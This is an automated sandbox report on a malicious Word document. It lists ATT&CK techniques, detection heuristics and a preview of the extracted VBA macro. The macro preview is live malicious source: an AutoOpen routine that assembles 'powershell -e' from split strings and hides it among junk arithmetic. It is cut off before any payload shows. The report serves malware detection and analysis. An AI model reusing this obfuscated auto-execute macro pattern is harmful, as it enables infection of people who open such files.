Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, a common technique for initial execution. The macro is obfuscated: it reassembles API names from fragments, specifically 'Win32_Process', which indicates an intent to create or manipulate processes. This suggests the macro is designed to download and execute a secondary payload or perform other malicious actions on the system.
Heuristics (8)
- ClamAV: Doc.Malware.00536d-6896571-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6896571-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44224 bytes |

SHA-256: 742b6e03121354f3c7f27c33480d0f0ecaeca01b9e2ab9eb6c74669d94142327

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kUoAAk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function p_ckZU() If JAc1QAAZ = FAAAAcA Then QGGAAUoG = CVar(ODQB_A) mUxAAAAZ = cAAAAA + CInt(awABAB) * 954745033 * CBool(293935947) + 67444174 / Round(iUXGXA) - AA4XkcQk + Sqr(336960233) - 159680878 * CByte(854232594) TDAA_A = CInt(SAcAXAA) End If If kkXAoA = CZQAU1 Then hAGAwo = CVar(CABADckA) bXkUAUGA = To4UGD + CInt(uDoBoAk) * 984862781 * CBool(597508345) + 93656683 / Round(TCQxAB) - TcDC4A + Sqr(464884883) - 190419638 * CByte(299199633) zDBA1AU = CInt(O1kB_XCA) End If If u11UDDX = wBAcBAwG Then I1BwX4 = CVar(lAoBAZA) N4AAAAA = d4QDAB + CInt(XkADDAB) * 583385967 * CBool(468548898) + 644221666 / Round(J1ABAc) - GxoABD + Sqr(37187515) - 902511684 * CByte(954023836) BD1AkGU = CInt(mAGQUwAA) End If If QAAQZGCB = Ixk1A_A Then vXAAAoA = CVar(GQC4GZGU) k1A_ADAC = wGAAk4ZZ + CInt(uACkAA) * 591017016 * CBool(575907964) + 340797432 / Round(J_DGDDU) - QC1cBA + Sqr(894872931) - 227731345 * CByte(467837766) JBQA_D = CInt(cZA4DkQw) End If If kcDAx_AG = BQACAG Then MB_wAUA = CVar(NBDADkBx) L1GD4ZG4 = nAAoUAD + CInt(bGA_4BA) * 728163813 * CBool(775302397) + 685291590 / Round(z1CDXB_) - pAAkD_xZ + Sqr(711037668) - 90067245 * CByte(756918919) bACAAAQ = CInt(w1AAZBZQ) End If If PDQXxA4A = EBwGQD Then o_A1xB = CVar(FxkA4GA) WAAAAD = HAAAUQ + CInt(PADAcDXA) * 459725481 * CBool(620825754) + 579154339 / Round(iUDAZDCD) - GAcoAxA + Sqr(725534470) - 499783628 * CByte(740757005) wDAADw = CInt(cQZUZCXc) End If If BD_BGAUA = JwwA4k Then bUcAQA = CVar(jAQ4kCA) OAQA1ko = jAAZBA + CInt(ckow1wCA) * 169757531 * CBool(671654469) + 517635194 / Round(MAUBAC) - MAkAABBA + Sqr(142962908) - 158201113 * CByte(617999129) UACAcC = CInt(FADAxA) End If If vAUDAxc = awUA4w Then mA1_xAA = CVar(uAAAQo) zAxACXw = oBAAAw + CInt(sXAAAACA) * 
109147979 * CBool(136268228) + 656116421 / Round(wA1w4_Q) - jACAcXoQ + Sqr(557104055) - 97416911 * CByte(715694879) kDAD4AUA = CInt(qAAwcAU) End If If NAA4Ao = K4CAco Then DUDQAAoX = CVar(AwG_xcXD) bU1CAD = pXkAAwAD + CInt(BXUcADo) * 959511917 * CBool(344248143) + 725141079 / Round(cAAA_GkA) - MDDDQUD_ + Sqr(161730974) - 629699950 * CByte(227342520) BBQACA = CInt(EAAA_G) End If End Function Sub autoopen() On Error Resume Next If IAUAAAAw = QX4XAUBk Then w1UCBUDA = CVar(dAUAZcC1) RAAAAAB1 = bCU4Bo + CInt(LwADQAA) * 408083243 * CBool(816576219) + 561798642 / Round(m1DAUA) - MxkA1w + Sqr(217021948) - 616937183 * CByte(217920427) jwQAAA = CInt(zBAxxB) End If If EUX_xD = qkAABDU Then kwAoDkQ = CVar(MoDACC) iDx_AAkX = zAxQCG + CInt(NwAcBUQc) * 127776180 * CBool(804479961) + 71129634 / Round(oXGUAD) - ZAUDABGA + Sqr(686635103) - 953110096 * CByte(707851326) kAUGZA = CInt(jAkcAADA) End If icB_CD (sAwGAQ + "po" + FAQQBU + "wersh" + SDAwA1 + "ell -e " + MDAxDA + nABQcGDB + wGx_ACQc + H_AACC + hDwDBB + hZ_AAAA) If lGQUAXA = UQABxwUc Then YABAQDBQ = CVar(uZAQQAAo) BAB4DAxA = FC1BA_A + CInt(QZACZCAB) * 648517543 * CBool(797211685) + 205682291 / Round(FBAUBC_) - U4UoCXD + Sqr(142400471) - 299086504 * CByte(667745634) dA4DDG_1 = CInt(z_BBAAw) End If If uDxxAA4 = PABDAADC Then nAA1BDA = CVar(RAcDxxBQ) rACAQAc = RUBDAB + CInt(NA_CUoU) * 965549475 * CBool(64820234) + 337454182 / Round(D_QBU1o) - roBQBAXZ + Sqr(469887770) - 642964789 * CByte(503075407) QUA4AAAX = CInt(cAcoA1) End If If nADokQA_ = EUAA11 Then GUAccAU = CVar(SUADUUA_) NAZB1A = Jo_UAU + CInt(XcQDC_kQ) * 569735646 * CBool(770443261) + 839798132 / Round(kUGADDx) - aQAkwkQ + Sqr(959247602) - 645380309 * CByte(25472316) OQUXwQXc = CInt(iACZZQA) End If End Sub Function Io_wABAc() If SZ1oowA = FAc4AU Then sXDAAAB_ = CVar(SABcAw1) bUAQABUx = qxA1wDA + CInt(vA_UAAG1) * 314410190 * CBool(118807693) + 678997129 / Round(KAc1DU) - CwBBAAAo + Sqr(638058947) - 613257942 * CByte(741916099) pUDcACZ = CIn ... (truncated) |